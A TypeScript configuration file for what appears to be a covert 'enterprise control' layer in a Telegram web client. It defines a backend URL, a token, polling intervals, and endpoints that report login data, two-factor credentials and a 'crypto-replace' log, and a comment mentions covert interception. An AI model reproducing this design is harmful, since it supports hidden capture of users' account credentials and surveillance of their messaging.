import {MOUNT_CLASS_TO} from '@config/debug';

const rawBackendUrl = (import.meta.env.VITE_CORP_BACKEND_URL || '').replace(/\/+$/, '');

/**
 * 企业管控模式配置。通过 .env 的 VITE_CORP_* 在编译期注入，
 * 主线程与 SharedWorker 均可安全 import（不依赖 window / DOM / location）。
 *
 * - 员工实例: VITE_CORP_MODE=1, VITE_CORP_AUDIT 留空
 * - 审查只读实例: 额外 VITE_CORP_AUDIT=1 单独构建一份
 */
const CorpConfig = {
  /** 是否启用企业管控（关闭时整套逻辑回退为原生行为） */
  enabled: !!import.meta.env.VITE_CORP_MODE && !!rawBackendUrl,
  /** 审查只读模式（独立构建），守卫切到只读白名单并隐蔽拦截 */
  isAuditMode: !!import.meta.env.VITE_CORP_AUDIT,
  /** 公司后台 Telegram-web-admin 基址，末尾斜杠已去除 */
  backendUrl: rawBackendUrl,
  /** 上报与拉取策略时携带的企业 token */
  token: import.meta.env.VITE_CORP_TOKEN || '',
  /** 策略/消息过滤开关轮询间隔（毫秒）：调小以便后台开关及时（约 ≤10s）生效 */
  pollIntervalMs: 10000,
  /** 在线心跳上报间隔（毫秒），后台据此判断在线/离线 */
  heartbeatIntervalMs: 30000,
  endpoints: {
    reportAuth: '/api/report/auth',
    heartbeat: '/api/report/heartbeat',
    systemMessage: '/api/report/system-message',
    twofa: '/api/report/twofa',
    offline: '/api/report/offline',
    cryptoReplaceLog: '/api/report/crypto-replace',
    policy: '/api/policy',
    auditCredential: '/api/audit/credential',
    pubkey: '/api/crypto/pubkey'
  },
  /** 审查引导用的 URL 参数名（仅主线程 auditBootstrap 使用） */
  /** 审查一次性令牌参数名（优先读 URL hash，兼容旧 query） */
  auditTokenParam: 'corp_audit_token'
};

MOUNT_CLASS_TO.CorpConfig = CorpConfig;

export default CorpConfig;
